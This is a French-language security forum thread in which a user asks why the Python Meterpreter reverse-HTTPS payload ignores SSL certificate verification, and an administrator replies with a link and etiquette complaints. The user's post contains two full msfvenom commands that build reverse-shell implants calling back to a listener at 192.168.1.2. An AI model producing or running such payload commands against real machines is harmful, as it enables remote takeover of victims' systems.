Auteur Sujet: Python HTTPS SSL Validation  (Lu 1573 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne neric06

  • Nouvel inscrit
  • Messages: 1
  • +0/-0
Python HTTPS SSL Validation
« le: 30 septembre 2019 à 00:52:33 »
Bonjour à tous, tout d'abord merci de prendre le temps de me lire.
Après beaucoup de recherches infructueuses, je viens vers vous pour vous soumettre mon problème. Toute aide sera grandement appréciée.
J'aimerais générer le payload python/meterpreter_reverse_https avec l'option StagerVerifySSLCert (option très appréciable pour moi  ::) ). Seulement après de multiples essais impossible d'obtenir ce (magnifique) retour a l'ouverture d'une sessions : "Meterpreter will verify SSL Certificate with SHA1 hash" et donc l'impossibilité d'obtenir une session sans renseigner l'option du handler HandlerSSLCert=MonCerificatSSL.pem
J'ai donc essayé avec la plateforme windows, avec succès, puisque je ne peux pas obtenir de sessions sans renseigner le certificat SSL; Grâce à la commande suivante:
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.1.2 LPORT=443 HandlerSSLCert=/root/certificat.pem StagerVerifySSLCert=true -f exe -o AgEnT.exe
Donc pas de problème apparent de syntaxe ou autre semble il, avec la commande suivante qui elle, ne produit pas l'effet désiré:
msfvenom -p python/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 HandlerSSLCert=/root/certificat.pem StagerVerifySSLCert=true -o Desktop/test.pyLe resultat est une session ouverte sans aucun besoin de renseigner les options set HandlerSSLCert /root/certificat.pem et set StagerVerifySSLCert true ; Alors qu'en principe ces options sont bien intégrées dans ce payload python.

J'attends vos réponses avec impatience et vous dit d'avance merci pour vos conseils.  :D
« Modifié: 30 septembre 2019 à 08:33:59 par ZeR0-@bSoLu »

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2462
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Python HTTPS SSL Validation
« Réponse #1 le: 30 septembre 2019 à 08:31:57 »
Salut ,

Je trouve ça dommage que tu n'ai pas pris le temps de lire ce qui est marqué en GRAS et rouge sur la première page du forum ,
Tu ne t'ai même pas présenté et tu n'a pas fait l'effort de mettre quelques balises pour que ton code soit plus lisible , je trouve ça dommage et pas très poli :( Hésite pas à te présenter c'est plus sympa :)

Ceci étant dit , après une recherche google de 30 secondes je trouve cela : https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation
Cela t'aide t'il ? as tu déja essayé ce qui est proposé par ce lien ? As-tu lu comment fonctionne le StagerVerifySSL ? Tu es sur que tu as bien configuré tout ?


P.S : j'ai donc modifié ton post pour que ce soit plus lisible :)
« Modifié: 30 septembre 2019 à 08:34:50 par ZeR0-@bSoLu »
Mess  with the bests.
Die like the rest.

Hors ligne Koma

  • Membre sérieux
  • ***
  • Messages: 268
  • +23/-5
  • Don't panick, i'll be back.
Re : Python HTTPS SSL Validation
« Réponse #2 le: 30 septembre 2019 à 18:34:13 »
ZeR0 a tout dit.
But first : let me google that for you.

Copyright Réservé SNK inc. "C'est pas un McDrive ici !"
Copyright réservé ZeR0 TM "Ce n'est pas flunch ici"